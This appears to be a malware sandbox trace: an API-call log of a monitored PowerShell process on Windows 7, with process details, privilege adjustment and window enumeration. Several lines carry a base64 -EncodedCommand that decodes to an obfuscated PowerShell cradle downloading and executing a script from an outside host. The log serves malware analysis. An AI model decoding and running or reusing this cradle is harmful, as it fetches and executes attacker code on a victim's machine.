	[0330.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.001] CoTaskMemFree (pv=0x24c710) 
	[0330.010] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0330.010] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.011] CoTaskMemFree (pv=0x24c710) 
	[0330.014] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7be240 | out: pNumArgs=0x1c7be240) returned 0x1ffae0*=""
	[0330.016] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.017] CoTaskMemAlloc (cb=0x22) returned 0x1b8d28a0
	[0330.017] RtlMoveMemory (in: Destination=0x1b8d28a0, Source=0x1ffb02, Length=0x20 | out: Destination=0x1b8d28a0) 
	[0330.017] CoTaskMemFree (pv=0x1b8d28a0) 
	[0330.017] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.017] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8b5ce0
	[0330.017] RtlMoveMemory (in: Destination=0x1b8b5ce0, Source=0x1ffb22, Length=0x2f2 | out: Destination=0x1b8b5ce0) 
	[0330.017] CoTaskMemFree (pv=0x1b8b5ce0) 
	[0330.018] LocalFree (hMem=0x1ffae0) returned 0x0
	[0330.663] CoTaskMemAlloc (cb=0x804) returned 0x1b8caab0
	[0330.663] GetConsoleTitleW (in: lpConsoleTitle=0x1b8caab0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0330.663] CoTaskMemFree (pv=0x1b8caab0) 
	[0331.806] CoTaskMemAlloc (cb=0x38e) returned 0x1b8b5ce0
	[0331.806] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7be1a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3124fb0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x3124fb0*(hProcess=0x368, hThread=0x364, dwProcessId=0xf64, dwThreadId=0xf68)) returned 1
	[0331.809] CoTaskMemFree (pv=0x1b8b5ce0) 
	[0331.810] CloseHandle (hObject=0x364) returned 1
	[0331.810] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c6070
	[0331.810] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7be248, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7be248) returned 0x4550
	[0331.811] CoTaskMemFree (pv=0x1b8c6070) 
	[0331.814] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.814] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.815] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7be328, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7be328*=0x364) returned 1

Process:
	id = "8"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x322b4000"
	os_pid = "0x74c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 40
	os_tid = 0x764

	[0247.229] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0247.955] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0247.956] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0247.956] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0247.956] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0249.855] GetVersionExW (in: lpVersionInformation=0x1adc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0249.857] GetVersionExW (in: lpVersionInformation=0x1adc20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adc20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0249.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.871] GetVersionExW (in: lpVersionInformation=0x1ad990*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad990*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0249.871] SetErrorMode (uMode=0x1) returned 0x1
	[0249.872] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1adaf0 | out: lpFileInformation=0x1adaf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0249.873] SetErrorMode (uMode=0x1) returned 0x1
	[0249.875] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1add60 | out: lpdwHandle=0x1add60) returned 0x94c
	[0249.877] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372d8 | out: lpData=0x2c372d8) returned 1
	[0249.879] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adcd8, puLen=0x1adcd0 | out: lplpBuffer=0x1adcd8*=0x2c37374, puLen=0x1adcd0) returned 1
	[0249.881] lstrlenW (lpString="䅁") returned 1
	[0249.889] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c37450, puLen=0x1adc40) returned 1
	[0249.889] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0249.891] CoTaskMemAlloc (cb=0x2e) returned 0x3ded10
	[0249.891] lstrcpyW (in: lpString1=0x3ded10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0249.892] CoTaskMemFree (pv=0x3ded10) 
	[0249.892] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c374a4, puLen=0x1adc40) returned 1
	[0249.892] lstrlenW (lpString="System.Management.Automation") returned 28
	[0249.892] CoTaskMemAlloc (cb=0x3c) returned 0x3dc460
	[0249.892] lstrcpyW (in: lpString1=0x3dc460, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0249.892] CoTaskMemFree (pv=0x3dc460) 
	[0249.892] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c37500, puLen=0x1adc40) returned 1
	[0249.892] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.892] CoTaskMemAlloc (cb=0x20) returned 0x3dcec0
	[0249.892] lstrcpyW (in: lpString1=0x3dcec0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.892] CoTaskMemFree (pv=0x3dcec0) 
	[0249.892] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c37540, puLen=0x1adc40) returned 1
	[0249.892] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.892] CoTaskMemAlloc (cb=0x44) returned 0x3dc460
	[0249.892] lstrcpyW (in: lpString1=0x3dc460, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.892] CoTaskMemFree (pv=0x3dc460) 
	[0249.892] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c375a8, puLen=0x1adc40) returned 1
	[0249.892] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0249.892] CoTaskMemAlloc (cb=0x76) returned 0x3799c0
	[0249.892] lstrcpyW (in: lpString1=0x3799c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0249.892] CoTaskMemFree (pv=0x3799c0) 
	[0249.892] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c37644, puLen=0x1adc40) returned 1
	[0249.892] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.892] CoTaskMemAlloc (cb=0x44) returned 0x3dc460
	[0249.892] lstrcpyW (in: lpString1=0x3dc460, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.892] CoTaskMemFree (pv=0x3dc460) 
	[0249.892] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c376a8, puLen=0x1adc40) returned 1
	[0249.892] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0249.892] CoTaskMemAlloc (cb=0x58) returned 0x393e80
	[0249.893] lstrcpyW (in: lpString1=0x393e80, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0249.893] CoTaskMemFree (pv=0x393e80) 
	[0249.893] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c37724, puLen=0x1adc40) returned 1
	[0249.893] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.893] CoTaskMemAlloc (cb=0x20) returned 0x3dcec0
	[0249.893] lstrcpyW (in: lpString1=0x3dcec0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.893] CoTaskMemFree (pv=0x3dcec0) 
	[0249.893] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2c373cc, puLen=0x1adc40) returned 1
	[0249.893] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0249.893] CoTaskMemAlloc (cb=0x66) returned 0x3d8750
	[0249.893] lstrcpyW (in: lpString1=0x3d8750, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0249.893] CoTaskMemFree (pv=0x3d8750) 
	[0249.893] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x0, puLen=0x1adc40) returned 0
	[0249.893] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x0, puLen=0x1adc40) returned 0
	[0249.893] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x0, puLen=0x1adc40) returned 0
	[0249.893] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adc18, puLen=0x1adc10 | out: lplpBuffer=0x1adc18*=0x2c37374, puLen=0x1adc10) returned 1
	[0249.894] CoTaskMemAlloc (cb=0x204) returned 0x383b30
	[0249.894] VerLanguageNameW (in: wLang=0x0, szLang=0x383b30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0249.895] CoTaskMemFree (pv=0x383b30) 
	[0249.895] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\", lplpBuffer=0x1adc68, puLen=0x1adc60 | out: lplpBuffer=0x1adc68*=0x2c37300, puLen=0x1adc60) returned 1
	[0249.899] GetCurrentProcessId () returned 0x74c
	[0250.449] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1acb90 | out: lpLuid=0x1acb90*(LowPart=0x14, HighPart=0)) returned 1
	[0250.451] GetCurrentProcess () returned 0xffffffffffffffff
	[0250.452] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1acbb0 | out: TokenHandle=0x1acbb0*=0x2e8) returned 1
	[0250.453] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2c3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0250.454] CloseHandle (hObject=0x2e8) returned 1
	[0250.457] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x74c) returned 0x2e8
	[0250.464] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2c3abb8, cb=0x200, lpcbNeeded=0x1adbc8 | out: lphModule=0x2c3abb8, lpcbNeeded=0x1adbc8) returned 1
	[0250.466] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2c3ae28, cb=0x18 | out: lpmodinfo=0x2c3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0250.467] CoTaskMemAlloc (cb=0x804) returned 0x3e60e0
	[0250.467] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x3e60e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0250.467] CoTaskMemFree (pv=0x3e60e0) 
	[0250.467] CoTaskMemAlloc (cb=0x804) returned 0x3e60e0
	[0250.467] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x3e60e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0250.468] CoTaskMemFree (pv=0x3e60e0) 
	[0250.468] CloseHandle (hObject=0x2e8) returned 1
	[0250.475] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x74c) returned 0x2e8
	[0250.475] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x1adcf8 | out: lpExitCode=0x1adcf8*=0x103) returned 1
	[0251.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0x1adcc0 | out: SystemInformation=0x12c3b088, ResultLength=0x1adcc0*=0x10228) returned 0x0
	[0251.068] EnumWindows (lpEnumFunc=0x29e66ac, lParam=0x0) returned 1
	[0252.771] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0253.691] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x558
	[0254.630] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0255.173] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0255.500] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0255.875] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x538
	[0256.732] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x778
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x778
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.466] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xa6c
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xa68
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x9f8
	[0257.467] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xa04
	[0257.468] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x924
	[0257.468] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x8dc
	[0257.468] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x7dc
	[0257.468] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x768
	[0257.468] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x764
	[0257.469] GetWindow (hWnd=0x301e0, uCmd=0x4) returned 0x0
	[0257.470] IsWindowVisible (hWnd=0x301e0) returned 0
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x820
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x810
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x794
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x83c
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x7ac
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb44
	[0257.470] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb5c
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x838
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
